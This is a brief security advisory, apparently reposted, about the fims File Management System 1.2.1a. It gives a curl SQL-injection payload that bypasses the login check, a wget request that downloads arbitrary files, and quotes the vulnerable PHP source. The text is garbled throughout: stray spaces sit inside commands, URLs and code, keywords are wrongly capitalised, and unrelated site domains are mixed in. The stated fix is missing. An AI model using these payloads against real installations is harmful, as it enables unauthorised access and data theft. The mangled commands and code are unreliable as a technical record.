Title: fims-File Management System <= 1.2.1a SQL Injection and Vulnerability
Author: Skraps (jackie. craig. sparks (at) live.com www.2cto.com jackie. craig. sparks (at) gmail.com @ skraps_foo)
: Http://fims.codeplex.com/
Affected Versions: 1.2.1a (tested)
---------------
Proof of test (POST or GET data)
---------------
Curl -- data "l = help@juno.com & password = word') or id = ABS ('1" http: // 127.0.0.1/fims /? P = 1
Wget "http://www.bkjia.com/fims/index. php? F = {anyfile number }"
---------------
Technical analysis:
---------------
Line 18 of index. php:
If (login ($ g_db, $ _ REQUEST [email], $ _ REQUEST [password])
Line 117 of functions. php:
Function login ($ db, $ email, $ password)
{
$ Rs = $ db-> execute ("select * from fims_user where email = '$ email' and password = md5 ('$ password ')");
If ($ db-> numrows ($ rs)> 0) return true;
Else return false;
}
Line 51 of index. php:
If (isset ($ _ REQUEST [f])
{
Assert (is_numeric ($ _ REQUEST [f]);
$ File = get_file_data ($ g_db, $ _ REQUEST [f]);
Header ("Accept-Ranges: bytes ");
Header ("Content-Length:". filesize ("files/". $ file [id]);
Header ("Content-Type: {$ file [mime]}");
Header ("Content-Disposition: inline; filename = \" {$ file ['label']} \ ";");
Readfile ("files/". $ file [id]);
}
Fix: see code analysis.